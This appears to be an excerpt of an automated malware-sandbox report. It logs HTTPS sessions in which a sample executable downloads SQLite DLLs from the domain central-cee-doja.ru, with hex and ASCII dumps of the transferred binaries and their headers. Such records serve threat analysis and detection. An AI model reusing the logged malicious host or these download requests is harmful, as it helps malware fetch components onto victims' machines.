                                                                                    2024-01-04 07:29:57 UTC1369INData Raw: 0a 28 3d 00 00 0a 2c 7a 02 0e 04 0e 06 73 2c 06 00 06 7d 08 00 00 04 02 0e 05 7d 09 00 00 04 02 0e 05 7d 0a 00 00 04 14 1f 09 14 14 14 14 02 7b 08 00 00 04 0e 05 1d 8d 1c 00 00 01 25 16 d0 05 00 00 02 28 3e 00 00 0a a2 25 17 03 8c 3d 00 00 02 a2 25 18 04 8c 21 00 00 01 a2 25 19 05 a2 25 1a 0e 04 8c b1 00 00 01 a2 25 1b 0e 05 a2 25 1c 0e 06 8c b3 00 00 01 a2 73 e6 01 00 06 28 09 02 00 06 2a 76 72 29 00 00 70 14 28 5c 05 00 06 2c 08 02 17 7d 18 00 00 04 2a 02 16 7d 18 00 00 04 2a 1e 02 7b 18 00 00 04 2a 7a 02 7b 19 00 00 04 2c 15 d0 05 00 00 02 28 3e 00 00 0a 6f 3f 00 00 0a 73 40 00 00 0a 7a 2a 00 1b 30 02 00 27 00 00 00 00 00 00 00 02 7b 19 00 00 04 2d 0d 02 28 0e 00 00 06 02 17 6f df 00 00 06 de 0f 02 03 28 4e 01 00 06 02 17 7d 19 00 00 04 dc 2a 00 01 10
                                                                                    Data Ascii: (=,zs,}}}{%(>%=%!%%%%s(*vr)p(\,}*}*{*z{,(>o?s@z*0'{-(o(N}*
                                                                                    2024-01-04 07:29:57 UTC1369INData Raw: 05 00 06 0c 08 7e 3c 00 00 0a 28 3d 00 00 0a 2d c8 06 6f 56 00 00 0a 2a 5e 02 7b 08 00 00 04 02 7b 08 00 00 04 28 2b 06 00 06 28 58 01 00 06 2a 1b 30 06 00 6b 00 00 00 06 00 00 11 7e 3c 00 00 0a 0a 03 2c 07 03 28 ff 06 00 06 0a 02 7b 08 00 00 04 28 2b 06 00 06 06 28 ec 05 00 06 0b 07 15 33 1f 28 57 00 00 0a 72 8d 00 00 70 17 8d 1c 00 00 01 25 16 03 a2 28 40 05 00 06 73 02 04 00 06 7a 07 2c 03 17 2b 01 16 0c de 1a 06 7e 3c 00 00 0a 28 3d 00 00 0a 2c 0c 06 28 f8 06 00 06 7e 3c 00 00 0a 0a dc 08 2a 00 01 10 00 00 02 00 06 00 49 4f 00 1a 00 00 00 00 46 02 7b 08 00 00 04 28 2b 06 00 06 28 a3 05 00 06 2a 46 02 7b 08 00 00 04 28 2b 06 00 06 28 8a 05 00 06 2a 1a 28 25 00 00 06 2a 1a 28 a5 05 00 06 2a 1a 28 27 00 00 06 2a 1e 16 28 a6 05 00 06 2a 7e 02 7b 08 00 00
                                                                                    Data Ascii: ~<(=-oV*^{{(+(X*0k~<,({(+(3(Wrp%(@sz,+~<(=,(~<*IOF{(+(*F{(+(*(%*(*('*(*~{
                                                                                    2024-01-04 07:29:57 UTC1369INData Raw: bf 00 00 70 73 02 04 00 06 7a 03 28 a8 05 00 06 0a 06 2c 0d 06 02 6f e1 00 00 06 73 01 04 00 06 7a 2a 00 1b 30 03 00 d1 00 00 00 0b 00 00 11 14 0b 28 67 00 00 0a 0c 03 7b f0 02 00 04 7b cf 00 00 04 20 e8 03 00 00 5a 0d 02 28 12 00 00 06 26 00 de 12 03 7b ec 02 00 04 28 31 06 00 06 28 b5 05 00 06 0a dc 02 28 11 00 00 06 2c 18 06 2c 0a 06 1f 64 2e 05 06 1f 65 33 03 1f 09 0a 06 14 73 01 04 00 06 7a 06 1f 09 33 02 16 2a 06 1f 64 33 02 17 2a 06 1f 65 33 02 16 2a 06 2c b3 02 03 6f e8 00 00 06 13 04 11 04 2d 0d 06 02 6f e1 00 00 06 73 01 04 00 06 7a 11 04 1c 2e 05 11 04 1b 33 8f 03 7b f0 02 00 04 2c 87 07 2d 06 73 68 00 00 0a 0b 28 67 00 00 0a 08 59 09 36 0e 11 04 02 6f e1 00 00 06 73 01 04 00 06 7a 07 17 20 96 00 00 00 6f 69 00 00 0a 28 6a 00 00 0a 38 50 ff ff
                                                                                    Data Ascii: psz(,osz*0(g{{ Z(&{(1((,,d.e3sz3*d3*e3*,o-osz.3{,-sh(gY6osz oi(j8P
                                                                                    2024-01-04 07:29:57 UTC1369INData Raw: 1f 65 33 04 1f 09 13 04 11 04 14 73 01 04 00 06 7a 11 04 1f 09 3b 88 01 00 00 11 04 1f 11 33 0b 11 05 17 58 13 05 38 5e 01 00 00 11 04 17 40 15 01 00 00 02 6f e1 00 00 06 72 e7 01 00 70 1b 28 77 00 00 0a 2d 73 04 1f 3b 6f 78 00 00 0a 13 10 11 10 15 33 0a 04 6f 74 00 00 0a 17 59 13 10 04 16 11 10 17 58 6f 79 00 00 0a 13 08 04 11 10 17 58 6f 7a 00 00 0a 10 02 0e 05 7e 72 00 00 0a 51 2b 14 02 03 04 05 0e 04 0e 05 6f e5 00 00 06 13 09 0e 05 50 10 02 11 09 2d 09 04 6f 74 00 00 0a 16 30 df 11 09 2c 09 11 09 11 08 6f 18 05 00 06 11 09 13 11 dd 69 01 00 00 02 7b 12 00 00 04 3a c5 00 00 00 02 6f e1 00 00 06 16 72 1d 02 00 70 16 1f 1a 1b 28 7b 00 00 0a 3a ab 00 00 00 0e 05 7e 72 00 00 0a 51 02 17 7d 12 00 00 04 7e 92 02 00 04 d0 09 00 00 02 28 3e 00 00 0a 6f 2e 00
                                                                                    Data Ascii: e3sz;3X8^@orp(w-s;ox3otYXoyXoz~rQ+oP-ot0,oi{:orp({:~rQ}~(>o.
                                                                                    2024-01-04 07:29:57 UTC1369INData Raw: 07 02 6f e1 00 00 06 73 01 04 00 06 7a 2a 00 00 00 13 30 03 00 64 00 00 00 15 00 00 11 03 7b ec 02 00 04 0a 02 7b 18 00 00 04 2d 08 04 28 39 05 00 06 2c 0e 06 05 0e 04 8c bf 00 00 01 28 40 00 00 06 04 1f 40 6a 28 36 05 00 06 2c 14 0e 04 6e 0c 06 28 31 06 00 06 05 08 28 ae 05 00 06 0b 2b 0f 06 28 31 06 00 06 05 0e 04 28 ad 05 00 06 0b 07 2c 0d 07 02 6f e1 00 00 06 73 01 04 00 06 7a 2a 13 30 03 00 45 00 00 00 14 00 00 11 03 7b ec 02 00 04 0a 02 7b 18 00 00 04 2d 08 04 28 39 05 00 06 2c 0e 06 05 0e 04 8c c3 00 00 01 28 40 00 00 06 06 28 31 06 00 06 05 0e 04 28 ae 05 00 06 0b 07 2c 0d 07 02 6f e1 00 00 06 73 01 04 00 06 7a 2a 00 00 00 13 30 03 00 45 00 00 00 14 00 00 11 03 7b ec 02 00 04 0a 02 7b 18 00 00 04 2d 08 04 28 39 05 00 06 2c 0e 06 05 0e 04 8c c4 00
                                                                                    Data Ascii: osz*0d{{-(9,(@@j(6,n(1(+(1(,osz*0E{{-(9,(@(1(,osz*0E{{-(9,
                                                                                    2024-01-04 07:29:57 UTC1369INData Raw: 13 30 06 00 62 00 00 00 19 00 00 11 03 7b ec 02 00 04 0a 06 28 31 06 00 06 05 28 6a 03 00 06 28 b3 05 00 06 0b 02 7b 18 00 00 04 2d 08 04 28 39 05 00 06 2c 37 06 28 31 06 00 06 0c 28 57 00 00 0a 72 30 04 00 70 19 8d 1c 00 00 01 25 16 08 8c b1 00 00 01 a2 25 17 05 a2 25 18 07 8c b5 00 00 01 a2 28 40 05 00 06 28 b2 04 00 06 07 2a 46 03 7b ec 02 00 04 28 31 06 00 06 28 b4 05 00 06 2a 13 30 03 00 36 00 00 00 1b 00 00 11 16 0a 03 7b ec 02 00 04 28 31 06 00 06 04 12 00 28 70 05 00 06 25 7e 3c 00 00 0a 28 66 00 00 0a 2c 0d 1d 02 6f e1 00 00 06 73 01 04 00 06 7a 06 28 6d 03 00 06 2a 4a 03 7b ec 02 00 04 28 31 06 00 06 04 28 bd 05 00 06 2a 00 00 00 13 30 04 00 66 00 00 00 1c 00 00 11 16 0a 03 7b ec 02 00 04 28 31 06 00 06 04 12 00 28 6e 05 00 06 0b 05 02 03 04 6f
                                                                                    Data Ascii: 0b{(1(j({-(9,7(1(Wr0p%%%(@(*F{(1(*06{(1(p%~<(f,osz(m*J{(1(*0f{(1(no
                                                                                    2024-01-04 07:29:57 UTC1369INData Raw: 0a 0a 0e 04 2d 03 06 6a 2a 07 0e 05 58 0e 04 8e 69 31 08 0e 04 8e 69 0e 05 59 0b 07 05 58 06 31 04 06 05 59 0b 07 16 31 0e 08 05 0e 04 0e 05 07 6f 91 00 00 0a 2b 02 16 0b 07 6a 2a 32 02 03 04 6f fb 00 00 06 1b fe 01 2a 1e 03 28 bf 05 00 06 2a 00 00 13 30 09 00 6f 00 00 00 08 00 00 11 02 7b 08 00 00 04 28 2b 06 00 06 03 28 6a 03 00 06 04 1a 7e 3c 00 00 0a 0e 04 0e 05 0e 06 05 2d 03 16 2b 01 17 28 83 05 00 06 0a 06 2d 2b 02 7b 08 00 00 04 28 2b 06 00 06 03 28 6a 03 00 06 04 17 7e 3c 00 00 0a 0e 04 0e 05 0e 06 05 2d 03 16 2b 01 17 28 83 05 00 06 0a 0e 07 2c 10 06 2c 0d 06 02 6f e1 00 00 06 73 01 04 00 06 7a 06 2a 00 13 30 05 00 55 00 00 00 08 00 00 11 02 7b 08 00 00 04 28 2b 06 00 06 03 28 6a 03 00 06 18 7e 3c 00 00 0a 05 28 be 05 00 06 0a 06 2d 1e 02 7b 08
                                                                                    Data Ascii: -j*Xi1iYX1Y1o+j*2o*(*0o{(+(j~<-+(-+{(+(j~<-+(,,osz*0U{(+(j~<(-{
                                                                                    2024-01-04 07:29:57 UTC1369INData Raw: 05 00 06 25 2c 09 0e 04 02 6f e1 00 00 06 51 0b de 1a 06 7e 3c 00 00 0a 28 3d 00 00 0a 2c 0c 06 28 f8 06 00 06 7e 3c 00 00 0a 0a dc 07 2a 01 10 00 00 02 00 18 00 28 40 00 1a 00 00 00 00 13 30 02 00 54 00 00 00 28 00 00 11 73 4f 00 00 0a 0a d0 0c 00 00 02 28 3e 00 00 0a 28 99 00 00 0a 0b 16 0c 2b 2d 07 08 9a 0d 09 28 6f 00 00 0a 2d 1d 06 6f 52 00 00 0a 16 31 0c 06 72 c0 05 00 70 6f 54 00 00 0a 26 06 09 6f 54 00 00 0a 26 08 17 58 0c 08 07 8e 69 32 cd 06 6f 56 00 00 0a 2a 13 30 02 00 54 00 00 00 28 00 00 11 73 4f 00 00 0a 0a d0 10 00 00 02 28 3e 00 00 0a 28 99 00 00 0a 0b 16 0c 2b 2d 07 08 9a 0d 09 28 6f 00 00 0a 2d 1d 06 6f 52 00 00 0a 16 31 0c 06 72 c0 05 00 70 6f 54 00 00 0a 26 06 09 6f 54 00 00 0a 26 08 17 58 0c 08 07 8e 69 32 cd 06 6f 56 00 00 0a 2a 13
                                                                                    Data Ascii: %,oQ~<(=,(~<*(@0T(sO(>(+-(o-oR1rpoT&oT&Xi2oV*0T(sO(>(+-(o-oR1rpoT&oT&Xi2oV*
                                                                                    2024-01-04 07:29:57 UTC1077INData Raw: 72 53 09 00 70 73 4a 00 00 0a 7a 7e 3c 00 00 0a 0a 28 92 00 00 0a 03 72 65 09 00 70 28 9b 00 00 0a 6f 95 00 00 0a 0b 14 0c 04 2c 16 28 92 00 00 0a 04 72 65 09 00 70 28 9b 00 00 0a 6f 95 00 00 0a 0c 02 7b 08 00 00 04 28 2b 06 00 06 07 08 12 00 28 97 05 00 06 0d 09 2c 0e 09 06 15 28 6d 03 00 06 73 01 04 00 06 7a de 1a 06 7e 3c 00 00 0a 28 3d 00 00 0a 2c 0c 06 28 a1 05 00 06 7e 3c 00 00 0a 0a dc 2a 01 10 00 00 02 00 14 00 59 6d 00 1a 00 00 00 00 13 30 02 00 29 00 00 00 08 00 00 11 02 7b 08 00 00 04 28 2b 06 00 06 03 2d 03 16 2b 01 15 28 f2 05 00 06 0a 06 2c 0d 06 02 6f e1 00 00 06 73 01 04 00 06 7a 2a 46 02 7b 08 00 00 04 28 2b 06 00 06 28 f3 05 00 06 2a 46 02 7b 08 00 00 04 28 2b 06 00 06 28 f4 05 00 06 2a 22 03 04 28 93 00 00 06 2a 36 02 03 28 6a 03 00 06
                                                                                    Data Ascii: rSpsJz~<(rep(o,(rep(o{(+(,(msz~<(=,(~<*Ym0){(+-+(,osz*F{(+(*F{(+(*"(*6(j


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3192.168.2.649715104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:29:58 UTC100OUTGET /dlls/System.Data.SQLite.EF6.dll HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:29:59 UTC674INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:29:59 GMT
                                                                                    Content-Type: application/x-msdos-program
                                                                                    Content-Length: 201528
                                                                                    Connection: close
                                                                                    Last-Modified: Tue, 02 Nov 2021 17:44:38 GMT
                                                                                    ETag: "31338-5cfd1d8ebcd80"
                                                                                    Accept-Ranges: bytes
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MQ2idcwsFaUlfUVfH5mutT3doVEUZlkIc9gyjlYf2EUj%2BM3uzMJQ%2BNJHCPuIceiif%2FoI0HWGrt56htRFVeZ4pUovmZ%2FZJsnC0B9H7wrUzxOa3CvneQAj9G02ZmYzy3AZmaduo1jI"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c608cb5d2415-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:29:59 UTC695INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b6 70 81 61 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 c8 02 00 00 08 00 00 00 00 00 00 72 e7 02 00 00 20 00 00 00 00 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 03 00 00 02 00 00 c1 29 03 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELpa" 0r @)`
                                                                                    2024-01-04 07:29:59 UTC1369INData Raw: 00 00 0a 0d 2b 41 09 6f 29 00 00 0a 74 1b 00 00 01 08 2c 04 16 0c 2b 0c 06 72 39 00 00 70 6f 22 00 00 0a 26 25 6f 2a 00 00 0a 07 6f 25 00 00 0a 06 72 3f 00 00 70 6f 22 00 00 0a 26 6f 2b 00 00 0a 07 6f 25 00 00 0a 09 6f 13 00 00 0a 2d b7 de 0a 09 2c 06 09 6f 12 00 00 0a dc 08 2c 2a 07 16 8c a3 00 00 01 1f 0b 6f 73 01 00 06 13 04 06 11 04 6f 2c 00 00 0a 6f 22 00 00 0a 26 06 72 47 00 00 70 6f 22 00 00 0a 26 06 6f 26 00 00 0a 26 06 72 51 00 00 70 6f 22 00 00 0a 26 02 6f 2d 00 00 0a 07 6f 25 00 00 0a 06 72 5f 00 00 70 6f 2e 00 00 0a 26 06 02 07 02 6f 21 00 00 0a 16 28 07 00 00 06 03 07 6f 70 01 00 06 51 06 6f 2f 00 00 0a 2a 01 10 00 00 02 00 5f 00 4d ac 00 0a 00 00 00 00 13 30 05 00 6e 00 00 00 02 00 00 11 7e 01 00 00 04 73 20 00 00 0a 25 02 16 72 63 00 00 70
                                                                                    Data Ascii: +Ao)t,+r9po"&%o*o%r?po"&o+o%o-,o,*oso,o"&rGpo"&o&&rQpo"&o-o%r_po.&o!(opQo/*_M0n~s %rcp
                                                                                    2024-01-04 07:29:59 UTC1369INData Raw: 05 fe 16 0b 00 00 1b 6f 12 00 00 0a dc 0e 04 2c 37 02 72 71 01 00 70 6f 22 00 00 0a 26 02 72 ce 02 00 70 28 f2 00 00 06 6f 22 00 00 0a 26 02 72 3f 00 00 70 6f 22 00 00 0a 26 02 72 7d 01 00 70 6f 2e 00 00 0a 26 2b 26 72 da 02 00 70 09 2d 07 72 19 02 00 70 2b 06 09 6f 34 00 00 0a 06 6f 40 00 00 0a 28 41 00 00 0a 73 42 00 00 0a 7a 02 72 5f 00 00 70 6f 2e 00 00 0a 26 2a 00 01 10 00 00 02 00 0c 01 9b a7 01 0e 00 00 00 00 2e 20 00 01 00 00 80 01 00 00 04 2a 1e 02 28 44 00 00 0a 2a 13 30 02 00 14 00 00 00 07 00 00 11 73 45 00 00 0a 0a 02 06 6f 0c 00 00 06 06 6f 2f 00 00 0a 2a 22 02 03 6f 0a 00 00 06 2a 00 00 00 13 30 02 00 14 00 00 00 07 00 00 11 73 45 00 00 0a 0a 02 06 6f 0a 00 00 06 06 6f 2f 00 00 0a 2a 6a 02 7b 02 00 00 04 2d 0b 02 73 46 00 00 0a 7d 02 00 00
                                                                                    Data Ascii: o,7rqpo"&rp(o"&r?po"&r}po.&+&rp-rp+o4o@(AsBzr_po.&*. *(D*0sEoo/*"o*0sEoo/*j{-sF}
                                                                                    2024-01-04 07:29:59 UTC1369INData Raw: 00 0e 00 00 00 1d 00 00 00 14 00 00 00 17 00 00 00 1a 00 00 00 20 00 00 00 2b 21 17 2a 19 2a 18 2a 1c 2a 1d 2a 1e 2a 1f 0f 2a 1f 09 2a 1f 0a 2a 1f 0b 2a 1f 0c 2a 1f 0e 2a 1f 10 2a 72 cc 03 00 70 02 8c 1f 00 00 01 28 70 00 00 0a 73 71 00 00 0a 7a 00 13 30 04 00 2f 00 00 00 0f 00 00 11 02 6f 72 00 00 0a 03 16 12 00 6f 73 00 00 0a 2c 1c 06 6f 74 00 00 0a 2c 14 06 6f 75 00 00 0a 2d 0c 06 6f 74 00 00 0a a5 19 00 00 1b 2a 04 2a 72 02 6f 65 00 00 0a 74 7e 00 00 01 6f 76 00 00 0a 03 28 35 00 00 06 6f 77 00 00 0a 2a 1b 30 02 00 3a 00 00 00 10 00 00 11 02 6f 78 00 00 0a 0a 2b 19 06 6f 79 00 00 0a 0b 07 6f 7a 00 00 0a 03 28 7b 00 00 0a 2c 04 07 0c de 16 06 6f 13 00 00 0a 2d df de 0a 06 2c 06 06 6f 12 00 00 0a dc 14 2a 08 2a 00 00 01 10 00 00 02 00 07 00 25 2c 00 0a
                                                                                    Data Ascii: +!*************rp(psqz0/oros,ot,ou-ot**roet~ov(5ow*0:ox+oyoz({,o-,o**%,
                                                                                    2024-01-04 07:29:59 UTC1369INData Raw: 6f 94 00 00 0a 28 7a 00 00 06 02 03 6f 95 00 00 0a 28 79 00 00 06 0a 06 60 2a 36 02 03 6f 96 00 00 0a 28 7c 00 00 06 2a 00 00 13 30 03 00 30 00 00 00 14 00 00 11 02 03 6f 97 00 00 0a 6f 98 00 00 0a 28 79 00 00 06 02 03 6f 99 00 00 0a 28 7c 00 00 06 0a 02 03 6f 9a 00 00 0a 28 77 00 00 06 0b 06 60 07 60 2a 13 30 03 00 1c 00 00 00 15 00 00 11 02 03 6f 90 00 00 0a 28 79 00 00 06 02 03 6f 91 00 00 0a 28 79 00 00 06 0a 06 60 2a 13 30 03 00 2b 00 00 00 14 00 00 11 02 03 6f 9b 00 00 0a 28 7a 00 00 06 02 03 6f 9c 00 00 0a 28 7a 00 00 06 0a 02 03 6f 9d 00 00 0a 28 79 00 00 06 0b 06 60 07 60 2a 00 13 30 03 00 2b 00 00 00 14 00 00 11 02 03 6f 9e 00 00 0a 28 79 00 00 06 02 03 6f 9f 00 00 0a 28 79 00 00 06 0a 02 03 6f a0 00 00 0a 28 79 00 00 06 0b 06 60 07 60 2a 36 02
                                                                                    Data Ascii: o(zo(y`*6o(|*00oo(yo(|o(w``*0o(yo(y`*0+o(zo(zo(y``*0+o(yo(yo(y``*6
                                                                                    2024-01-04 07:29:59 UTC1369INData Raw: 0a 25 72 1e 06 00 70 14 fe 06 d5 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 28 06 00 70 14 fe 06 d5 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 34 06 00 70 14 fe 06 d5 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 3c 06 00 70 14 fe 06 d5 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 46 06 00 70 14 fe 06 d5 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 54 06 00 70 14 fe 06 d5 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 62 06 00 70 14 fe 06 d3 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 72 06 00 70 14 fe 06 d4 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 84 06 00 70 14 fe 06 d3 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 94 06 00 70 14 fe 06 d4 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 a6 06 00 70 14 fe 06 ce 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25
                                                                                    Data Ascii: %rpso%r(pso%r4pso%r<pso%rFpso%rTpso%rbpso%rrpso%rpso%rpso%rpso%
                                                                                    2024-01-04 07:29:59 UTC1369INData Raw: 1b 30 03 00 2d 00 00 00 1b 00 00 11 20 00 04 00 00 73 20 00 00 0a 0a 06 73 14 01 00 06 0b 03 07 02 6f 0e 00 00 06 de 0a 07 2c 06 07 6f 12 00 00 0a dc 06 6f 2f 00 00 0a 2a 00 00 00 01 10 00 00 02 00 12 00 0a 1c 00 0a 00 00 00 00 1b 30 04 00 9c 01 00 00 1c 00 00 11 7e 58 00 00 04 73 ce 00 00 0a 0a 02 03 06 28 85 00 00 06 2c 0e 06 6f cf 00 00 0a 28 07 00 00 2b 16 30 05 04 14 51 16 2a 73 4a 00 00 06 0b 17 0c 06 6f cf 00 00 0a 6f d1 00 00 0a 0d 38 3f 01 00 00 09 6f d2 00 00 0a 13 04 06 11 04 6f d3 00 00 0a 13 05 08 2d 0d 07 72 e4 08 00 70 6f 46 00 00 06 2b 02 16 0c 11 05 7e 5a 00 00 04 25 2d 17 26 7e 59 00 00 04 fe 06 ce 01 00 06 73 d4 00 00 0a 25 80 5a 00 00 04 28 08 00 00 2b 13 06 11 06 28 07 00 00 2b 13 07 11 07 17 33 26 02 11 04 07 28 f1 00 00 06 07 72 3f
                                                                                    Data Ascii: 0- s so,oo/*0~Xs(,o(+0Q*sJoo8?oo-rpoF+~Z%-&~Ys%Z(+(+3&(r?
                                                                                    2024-01-04 07:29:59 UTC1369INData Raw: 06 0a 2b 06 73 88 00 00 0a 7a 06 2a 00 00 00 13 30 05 00 d2 02 00 00 1f 00 00 11 73 4a 00 00 06 0a 03 6f c8 00 00 0a 12 01 28 2e 00 00 06 39 b2 02 00 00 07 45 0f 00 00 00 1b 00 00 00 31 00 00 00 55 00 00 00 6b 00 00 00 cd 00 00 00 64 01 00 00 88 01 00 00 06 02 00 00 6a 02 00 00 dd 01 00 00 05 00 00 00 f3 01 00 00 27 02 00 00 5f 02 00 00 54 02 00 00 38 65 02 00 00 06 03 6f da 00 00 0a 6f 2f 00 00 0a 6f 46 00 00 06 38 5b 02 00 00 03 6f da 00 00 0a 74 34 00 00 1b 06 28 fa 00 00 06 38 45 02 00 00 06 03 6f da 00 00 0a a5 ae 00 00 01 2d 07 72 d6 09 00 70 2b 05 72 da 09 00 70 6f 46 00 00 06 38 21 02 00 00 06 03 6f da 00 00 0a 6f 2f 00 00 0a 6f 46 00 00 06 38 0b 02 00 00 02 7b 15 00 00 04 7b 3d 00 00 04 28 e7 00 00 06 03 6f da 00 00 0a a5 b3 00 00 01 02 7b 15 00
                                                                                    Data Ascii: +sz*0sJo(.9E1Ukdj'_T8eoo/oF8[ot4(8Eo-rp+rpoF8!oo/oF8{{=(o{
                                                                                    2024-01-04 07:29:59 UTC1369INData Raw: 03 6f c8 00 00 0a 28 0d 00 00 2b 6f 66 00 00 0a 28 0e 00 00 2b 03 6f 9a 00 00 0a 28 fb 00 00 06 0c 08 2c 37 02 07 03 6f 97 00 00 0a 6f e5 00 00 0a 03 6f 97 00 00 0a 6f e6 00 00 0a 16 12 00 28 e6 00 00 06 0d 02 09 03 6f 97 00 00 0a 6f e5 00 00 0a 06 16 28 e3 00 00 06 2b 02 07 0d 6f 6a 00 00 0a 6f e9 00 00 0a 8c 36 00 00 1b 13 04 11 04 6f 13 00 00 0a 26 7e ea 00 00 0a 13 05 03 6f 99 00 00 0a 6f d1 00 00 0a 13 06 38 42 01 00 00 11 06 6f d2 00 00 0a 11 04 6f eb 00 00 0a 6f 34 00 00 0a 28 f2 00 00 06 13 07 09 6f 0b 01 00 06 11 05 6f 46 00 00 06 02 6f 06 00 00 2b 13 08 08 2d 54 09 6f 08 01 00 06 11 05 6f 46 00 00 06 09 6f 08 01 00 06 6f 47 00 00 06 09 6f 08 01 00 06 11 08 6f 46 00 00 06 09 6f 08 01 00 06 72 62 0a 00 70 6f 46 00 00 06 09 6f 08 01 00 06 11 07 6f
                                                                                    Data Ascii: o(+of(+o(,7oooo(oo(+ojo6o&~oo8Booo4(ooFo+-TooFooGooForbpoFoo
                                                                                    2024-01-04 07:29:59 UTC1369INData Raw: 53 00 00 01 0a 06 2c 0d 06 6f b8 00 00 0a 02 6f 06 00 00 2b 2a 03 6f b8 00 00 0a 75 38 00 00 01 0b 07 2c 09 02 07 17 28 be 00 00 06 2a 03 6f b8 00 00 0a 75 52 00 00 01 0c 08 2c 09 02 08 17 28 c0 00 00 06 2a 03 6f b8 00 00 0a 75 51 00 00 01 0d 09 2c 22 09 6f bc 00 00 0a 1f 0d 33 18 02 72 cc 09 00 70 09 6f 90 00 00 0a 09 6f 91 00 00 0a 28 bc 00 00 06 2a 73 4a 00 00 06 25 72 18 0b 00 70 6f 46 00 00 06 25 03 6f b8 00 00 0a 02 6f 06 00 00 2b 6f 46 00 00 06 25 72 d7 00 00 70 6f 46 00 00 06 2a 46 73 4a 00 00 06 25 72 26 0b 00 70 6f 46 00 00 06 2a 00 00 00 13 30 04 00 27 00 00 00 19 00 00 11 14 0a 02 03 12 00 28 8f 00 00 06 2c 02 06 2a 02 72 e4 08 00 70 03 6f 90 00 00 0a 03 6f 91 00 00 0a 28 bc 00 00 06 2a 72 73 4a 00 00 06 25 72 30 0b 00 70 03 6f f3 00 00 0a 28
                                                                                    Data Ascii: S,oo+*ou8,(*ouR,(*ouQ,"o3rpoo(*sJ%rpoF%oo+oF%rpoF*FsJ%r&poF*0'(,*rpoo(*rsJ%r0po(


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4192.168.2.649716104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:00 UTC77OUTGET /dlls/System.Data.SQLite.Linq.dll HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:00 UTC674INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:00 GMT
                                                                                    Content-Type: application/x-msdos-program
                                                                                    Content-Length: 201520
                                                                                    Connection: close
                                                                                    Last-Modified: Tue, 02 Nov 2021 17:45:14 GMT
                                                                                    ETag: "31330-5cfd1db111e80"
                                                                                    Accept-Ranges: bytes
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8PuTs9WnWYigBgh49EoJ3owYQ4a8D%2FK9bSUxP%2FtjJ31W2e1vNLvUZyvIX5SjxW3A54exI%2BtSDpNoUTYzk5m5rM7CRxg7yWEz7JXfsQyi3AU8mIVJZb1t7H2TJzzxAIRrvDztbAx%2B"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c60f2e9357e8-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:00 UTC695INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b5 70 81 61 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 c8 02 00 00 08 00 00 00 00 00 00 d6 e6 02 00 00 20 00 00 00 00 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 03 00 00 02 00 00 c7 99 03 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 